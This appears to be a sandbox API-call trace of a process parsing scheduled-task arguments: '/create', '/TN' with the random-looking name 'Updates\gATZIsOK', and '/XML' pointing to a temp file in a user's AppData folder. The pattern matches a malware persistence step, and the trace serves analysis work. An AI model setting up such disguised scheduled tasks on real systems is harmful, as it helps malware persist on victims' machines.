[0184.388] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0184.388] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.388] lstrlenW (lpString="|sc|") returned 4
[0184.388] lstrlenW (lpString="|TN|") returned 4
[0184.388] StrStrIW (lpFirst="|sc|", lpSrch="|TN|") returned 0x0
[0184.388] RtlRestoreLastWin32Error () returned 0x490
[0184.388] lstrlenW (lpString="mo") returned 2
[0184.388] lstrlenW (lpString="mo") returned 2
[0184.388] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.388] lstrlenW (lpString="TN") returned 2
[0184.388] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.389] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0184.389] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.389] lstrlenW (lpString="|mo|") returned 4
[0184.389] lstrlenW (lpString="|TN|") returned 4
[0184.389] StrStrIW (lpFirst="|mo|", lpSrch="|TN|") returned 0x0
[0184.389] RtlRestoreLastWin32Error () returned 0x490
[0184.389] lstrlenW (lpString="d") returned 1
[0184.389] lstrlenW (lpString="d") returned 1
[0184.389] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.389] lstrlenW (lpString="TN") returned 2
[0184.389] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.389] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0184.389] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.389] lstrlenW (lpString="|d|") returned 3
[0184.389] lstrlenW (lpString="|TN|") returned 4
[0184.389] RtlRestoreLastWin32Error () returned 0x490
[0184.389] lstrlenW (lpString="m") returned 1
[0184.389] lstrlenW (lpString="m") returned 1
[0184.389] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.389] lstrlenW (lpString="TN") returned 2
[0184.389] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.389] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0184.389] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.389] lstrlenW (lpString="|m|") returned 3
[0184.389] lstrlenW (lpString="|TN|") returned 4
[0184.389] RtlRestoreLastWin32Error () returned 0x490
[0184.389] lstrlenW (lpString="i") returned 1
[0184.389] lstrlenW (lpString="i") returned 1
[0184.389] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.390] lstrlenW (lpString="TN") returned 2
[0184.390] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.390] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0184.390] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.390] lstrlenW (lpString="|i|") returned 3
[0184.390] lstrlenW (lpString="|TN|") returned 4
[0184.390] RtlRestoreLastWin32Error () returned 0x490
[0184.390] lstrlenW (lpString="tn") returned 2
[0184.390] lstrlenW (lpString="tn") returned 2
[0184.390] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.390] lstrlenW (lpString="TN") returned 2
[0184.390] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.390] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0184.390] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|TN|") returned 4
[0184.390] lstrlenW (lpString="|tn|") returned 4
[0184.390] lstrlenW (lpString="|TN|") returned 4
[0184.390] StrStrIW (lpFirst="|tn|", lpSrch="|TN|") returned="|tn|"
[0184.390] RtlRestoreLastWin32Error () returned 0x0
[0184.390] RtlRestoreLastWin32Error () returned 0x0
[0184.390] lstrlenW (lpString="Updates\\gATZIsOK") returned 16
[0184.390] lstrlenW (lpString="-/") returned 2
[0184.390] StrChrIW (lpStart="-/", wMatch=0x280055) returned 0x0
[0184.390] RtlRestoreLastWin32Error () returned 0x490
[0184.390] RtlRestoreLastWin32Error () returned 0x490
[0184.390] RtlRestoreLastWin32Error () returned 0x0
[0184.390] lstrlenW (lpString="Updates\\gATZIsOK") returned 16
[0184.390] StrChrIW (lpStart="Updates\\gATZIsOK", wMatch=0x3a) returned 0x0
[0184.390] RtlRestoreLastWin32Error () returned 0x490
[0184.390] RtlRestoreLastWin32Error () returned 0x0
[0184.391] lstrlenW (lpString="Updates\\gATZIsOK") returned 16
[0184.391] RtlRestoreLastWin32Error () returned 0x0
[0184.391] RtlRestoreLastWin32Error () returned 0x0
[0184.391] lstrlenW (lpString="/XML") returned 4
[0184.391] lstrlenW (lpString="-/") returned 2
[0184.391] StrChrIW (lpStart="-/", wMatch=0x28002f) returned="/"
[0184.391] lstrlenW (lpString="create") returned 6
[0184.391] lstrlenW (lpString="create") returned 6
[0184.391] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.391] lstrlenW (lpString="XML") returned 3
[0184.391] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.391] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x9, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|create|") returned 8
[0184.391] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.391] lstrlenW (lpString="|create|") returned 8
[0184.391] lstrlenW (lpString="|XML|") returned 5
[0184.391] StrStrIW (lpFirst="|create|", lpSrch="|XML|") returned 0x0
[0184.391] RtlRestoreLastWin32Error () returned 0x490
[0184.391] lstrlenW (lpString="?") returned 1
[0184.391] lstrlenW (lpString="?") returned 1
[0184.391] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.391] lstrlenW (lpString="XML") returned 3
[0184.391] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.391] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|?|") returned 3
[0184.391] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.391] lstrlenW (lpString="|?|") returned 3
[0184.391] lstrlenW (lpString="|XML|") returned 5
[0184.391] RtlRestoreLastWin32Error () returned 0x490
[0184.392] lstrlenW (lpString="s") returned 1
[0184.392] lstrlenW (lpString="s") returned 1
[0184.392] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.392] lstrlenW (lpString="XML") returned 3
[0184.392] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.392] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|s|") returned 3
[0184.392] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.392] lstrlenW (lpString="|s|") returned 3
[0184.392] lstrlenW (lpString="|XML|") returned 5
[0184.392] RtlRestoreLastWin32Error () returned 0x490
[0184.392] lstrlenW (lpString="u") returned 1
[0184.392] lstrlenW (lpString="u") returned 1
[0184.392] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.392] lstrlenW (lpString="XML") returned 3
[0184.392] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.392] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|u|") returned 3
[0184.392] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.392] lstrlenW (lpString="|u|") returned 3
[0184.392] lstrlenW (lpString="|XML|") returned 5
[0184.392] RtlRestoreLastWin32Error () returned 0x490
[0184.392] lstrlenW (lpString="p") returned 1
[0184.392] lstrlenW (lpString="p") returned 1
[0184.392] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.392] lstrlenW (lpString="XML") returned 3
[0184.392] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.392] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|p|") returned 3
[0184.392] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.393] lstrlenW (lpString="|p|") returned 3
[0184.393] lstrlenW (lpString="|XML|") returned 5
[0184.393] RtlRestoreLastWin32Error () returned 0x490
[0184.393] lstrlenW (lpString="ru") returned 2
[0184.393] lstrlenW (lpString="ru") returned 2
[0184.393] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.393] lstrlenW (lpString="XML") returned 3
[0184.393] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.393] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ru|") returned 4
[0184.393] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.393] lstrlenW (lpString="|ru|") returned 4
[0184.393] lstrlenW (lpString="|XML|") returned 5
[0184.393] RtlRestoreLastWin32Error () returned 0x490
[0184.393] lstrlenW (lpString="rp") returned 2
[0184.393] lstrlenW (lpString="rp") returned 2
[0184.393] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.393] lstrlenW (lpString="XML") returned 3
[0184.393] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.393] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|rp|") returned 4
[0184.393] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.393] lstrlenW (lpString="|rp|") returned 4
[0184.393] lstrlenW (lpString="|XML|") returned 5
[0184.393] RtlRestoreLastWin32Error () returned 0x490
[0184.393] lstrlenW (lpString="sc") returned 2
[0184.393] lstrlenW (lpString="sc") returned 2
[0184.393] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.393] lstrlenW (lpString="XML") returned 3
[0184.394] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.394] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sc|") returned 4
[0184.394] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.394] lstrlenW (lpString="|sc|") returned 4
[0184.394] lstrlenW (lpString="|XML|") returned 5
[0184.394] RtlRestoreLastWin32Error () returned 0x490
[0184.394] lstrlenW (lpString="mo") returned 2
[0184.394] lstrlenW (lpString="mo") returned 2
[0184.394] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.394] lstrlenW (lpString="XML") returned 3
[0184.394] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.394] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|mo|") returned 4
[0184.394] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.394] lstrlenW (lpString="|mo|") returned 4
[0184.394] lstrlenW (lpString="|XML|") returned 5
[0184.394] RtlRestoreLastWin32Error () returned 0x490
[0184.394] lstrlenW (lpString="d") returned 1
[0184.394] lstrlenW (lpString="d") returned 1
[0184.394] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.394] lstrlenW (lpString="XML") returned 3
[0184.394] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.394] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|d|") returned 3
[0184.394] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.394] lstrlenW (lpString="|d|") returned 3
[0184.394] lstrlenW (lpString="|XML|") returned 5
[0184.394] RtlRestoreLastWin32Error () returned 0x490
[0184.394] lstrlenW (lpString="m") returned 1
[0184.395] lstrlenW (lpString="m") returned 1
[0184.395] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.395] lstrlenW (lpString="XML") returned 3
[0184.395] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.395] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|m|") returned 3
[0184.395] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.395] lstrlenW (lpString="|m|") returned 3
[0184.395] lstrlenW (lpString="|XML|") returned 5
[0184.395] RtlRestoreLastWin32Error () returned 0x490
[0184.395] lstrlenW (lpString="i") returned 1
[0184.395] lstrlenW (lpString="i") returned 1
[0184.395] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.395] lstrlenW (lpString="XML") returned 3
[0184.395] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.395] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|i|") returned 3
[0184.395] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.395] lstrlenW (lpString="|i|") returned 3
[0184.395] lstrlenW (lpString="|XML|") returned 5
[0184.395] RtlRestoreLastWin32Error () returned 0x490
[0184.395] lstrlenW (lpString="tn") returned 2
[0184.395] lstrlenW (lpString="tn") returned 2
[0184.395] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.395] lstrlenW (lpString="XML") returned 3
[0184.395] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.395] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tn|") returned 4
[0184.395] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.395] lstrlenW (lpString="|tn|") returned 4
[0184.396] lstrlenW (lpString="|XML|") returned 5
[0184.396] RtlRestoreLastWin32Error () returned 0x490
[0184.396] lstrlenW (lpString="tr") returned 2
[0184.396] lstrlenW (lpString="tr") returned 2
[0184.396] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.396] lstrlenW (lpString="XML") returned 3
[0184.396] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.396] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|tr|") returned 4
[0184.396] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.396] lstrlenW (lpString="|tr|") returned 4
[0184.396] lstrlenW (lpString="|XML|") returned 5
[0184.396] RtlRestoreLastWin32Error () returned 0x490
[0184.396] lstrlenW (lpString="st") returned 2
[0184.396] lstrlenW (lpString="st") returned 2
[0184.396] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.396] lstrlenW (lpString="XML") returned 3
[0184.396] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.396] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|st|") returned 4
[0184.396] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.396] lstrlenW (lpString="|st|") returned 4
[0184.396] lstrlenW (lpString="|XML|") returned 5
[0184.396] RtlRestoreLastWin32Error () returned 0x490
[0184.396] lstrlenW (lpString="sd") returned 2
[0184.396] lstrlenW (lpString="sd") returned 2
[0184.396] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.396] lstrlenW (lpString="XML") returned 3
[0184.396] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.397] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|sd|") returned 4
[0184.397] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.397] lstrlenW (lpString="|sd|") returned 4
[0184.397] lstrlenW (lpString="|XML|") returned 5
[0184.397] RtlRestoreLastWin32Error () returned 0x490
[0184.397] lstrlenW (lpString="ed") returned 2
[0184.397] lstrlenW (lpString="ed") returned 2
[0184.397] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.397] lstrlenW (lpString="XML") returned 3
[0184.397] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.397] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ed|") returned 4
[0184.397] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.397] lstrlenW (lpString="|ed|") returned 4
[0184.397] lstrlenW (lpString="|XML|") returned 5
[0184.397] RtlRestoreLastWin32Error () returned 0x490
[0184.397] lstrlenW (lpString="it") returned 2
[0184.397] lstrlenW (lpString="it") returned 2
[0184.397] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.397] lstrlenW (lpString="XML") returned 3
[0184.397] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.397] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|it|") returned 4
[0184.397] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.397] lstrlenW (lpString="|it|") returned 4
[0184.397] lstrlenW (lpString="|XML|") returned 5
[0184.397] RtlRestoreLastWin32Error () returned 0x490
[0184.397] lstrlenW (lpString="et") returned 2
[0184.397] lstrlenW (lpString="et") returned 2
[0184.398] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.398] lstrlenW (lpString="XML") returned 3
[0184.398] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.398] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|et|") returned 4
[0184.398] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.398] lstrlenW (lpString="|et|") returned 4
[0184.398] lstrlenW (lpString="|XML|") returned 5
[0184.398] RtlRestoreLastWin32Error () returned 0x490
[0184.398] lstrlenW (lpString="k") returned 1
[0184.398] lstrlenW (lpString="k") returned 1
[0184.398] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.398] lstrlenW (lpString="XML") returned 3
[0184.398] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.398] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|k|") returned 3
[0184.398] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.398] lstrlenW (lpString="|k|") returned 3
[0184.398] lstrlenW (lpString="|XML|") returned 5
[0184.398] RtlRestoreLastWin32Error () returned 0x490
[0184.398] lstrlenW (lpString="du") returned 2
[0184.398] lstrlenW (lpString="du") returned 2
[0184.398] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.398] lstrlenW (lpString="XML") returned 3
[0184.398] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.398] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|du|") returned 4
[0184.398] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.399] lstrlenW (lpString="|du|") returned 4
[0184.399] lstrlenW (lpString="|XML|") returned 5
[0184.399] RtlRestoreLastWin32Error () returned 0x490
[0184.399] lstrlenW (lpString="ri") returned 2
[0184.399] lstrlenW (lpString="ri") returned 2
[0184.399] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.399] lstrlenW (lpString="XML") returned 3
[0184.399] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.399] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|ri|") returned 4
[0184.399] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.399] lstrlenW (lpString="|ri|") returned 4
[0184.399] lstrlenW (lpString="|XML|") returned 5
[0184.399] RtlRestoreLastWin32Error () returned 0x490
[0184.399] lstrlenW (lpString="z") returned 1
[0184.399] lstrlenW (lpString="z") returned 1
[0184.399] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.399] lstrlenW (lpString="XML") returned 3
[0184.399] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.399] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|z|") returned 3
[0184.399] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.399] lstrlenW (lpString="|z|") returned 3
[0184.399] lstrlenW (lpString="|XML|") returned 5
[0184.399] RtlRestoreLastWin32Error () returned 0x490
[0184.399] lstrlenW (lpString="f") returned 1
[0184.399] lstrlenW (lpString="f") returned 1
[0184.399] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.399] lstrlenW (lpString="XML") returned 3
[0184.400] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.400] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x4, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|f|") returned 3
[0184.400] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.400] lstrlenW (lpString="|f|") returned 3
[0184.400] lstrlenW (lpString="|XML|") returned 5
[0184.400] RtlRestoreLastWin32Error () returned 0x490
[0184.400] lstrlenW (lpString="v1") returned 2
[0184.400] lstrlenW (lpString="v1") returned 2
[0184.400] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.400] lstrlenW (lpString="XML") returned 3
[0184.400] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.400] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x5, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|v1|") returned 4
[0184.400] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.400] lstrlenW (lpString="|v1|") returned 4
[0184.400] lstrlenW (lpString="|XML|") returned 5
[0184.400] RtlRestoreLastWin32Error () returned 0x490
[0184.400] lstrlenW (lpString="xml") returned 3
[0184.400] lstrlenW (lpString="xml") returned 3
[0184.400] _memicmp (_Buf1=0x49273c8, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.400] lstrlenW (lpString="XML") returned 3
[0184.400] _memicmp (_Buf1=0x4927410, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.400] _vsnwprintf (in: _Buffer=0x4929698, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|xml|") returned 5
[0184.400] _vsnwprintf (in: _Buffer=0x49295b8, _BufferCount=0x6, _Format="|%s|", _ArgList=0xdcf48 | out: _Buffer="|XML|") returned 5
[0184.400] lstrlenW (lpString="|xml|") returned 5
[0184.400] lstrlenW (lpString="|XML|") returned 5
[0184.401] StrStrIW (lpFirst="|xml|", lpSrch="|XML|") returned="|xml|"
[0184.401] RtlRestoreLastWin32Error () returned 0x0
[0184.401] RtlRestoreLastWin32Error () returned 0x0
[0184.401] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.401] lstrlenW (lpString="-/") returned 2
[0184.401] StrChrIW (lpStart="-/", wMatch=0x280043) returned 0x0
[0184.401] RtlRestoreLastWin32Error () returned 0x490
[0184.401] RtlRestoreLastWin32Error () returned 0x490
[0184.401] RtlRestoreLastWin32Error () returned 0x0
[0184.401] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.401] StrChrIW (lpStart="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp", wMatch=0x3a) returned=":\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp"
[0184.401] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.401] _memicmp (_Buf1=0x4927440, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.401] _memicmp (_Buf1=0x492aa08, _Buf2=0x3d2708, _Size=0x7) returned 0
[0184.401] RtlRestoreLastWin32Error () returned 0x7a
[0184.401] RtlRestoreLastWin32Error () returned 0x0
[0184.401] RtlRestoreLastWin32Error () returned 0x0
[0184.401] lstrlenW (lpString="C") returned 1
[0184.401] RtlRestoreLastWin32Error () returned 0x490
[0184.401] RtlRestoreLastWin32Error () returned 0x0
[0184.401] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.401] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp\\tmpDA5D.tmp") returned 52
[0184.401] GetProcessHeap () returned 0x4920000
[0184.401] RtlAllocateHeap (HeapHandle=0x4920000, Flags=0xc, Size=0x6a) returned 0x4926a48
[0184.453] RtlRestoreLastWin32Error () returned 0x0
